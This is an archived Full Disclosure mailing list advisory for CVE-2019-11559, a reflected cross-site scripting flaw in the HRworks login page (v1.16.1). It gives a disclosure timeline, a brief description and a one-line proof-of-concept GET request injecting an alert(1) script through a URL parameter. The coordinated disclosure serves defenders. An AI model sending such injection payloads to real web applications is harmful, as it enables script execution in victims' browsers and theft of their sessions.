lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 18 Sep 2019 09:51:06 +0000
From: Georg Ph E Heise via Fulldisclosure <>
To: "" <>
Subject: [FD] Reflected XSS – HRworks Login (v1.16.1)

# Exploit Title:  Reflected XSS – HRworks Login (v1.16.1)

# Vendor Homepage:

# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions

# Contact:

# Website:

# Category: webapps

# CVE: CVE-2019-11559


26.04.2019 Disclosure to Vendor

29.04.2019 Vendor informed that the issue was remediated

17.09.2019 Publication

1. Description:

The URL parameter of the login page accepts unfiltered parameters that lead to several version of reflected XSS

2. Proof of Concept:

Vulnerable Source


GET /?re44h"-alert(1)-"bb8rf=1 HTTP/1.1


Accept-Encoding: gzip, deflate

Accept: */*

3. Solution:

As date of publication all versions above 1.16.3 are save to use

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists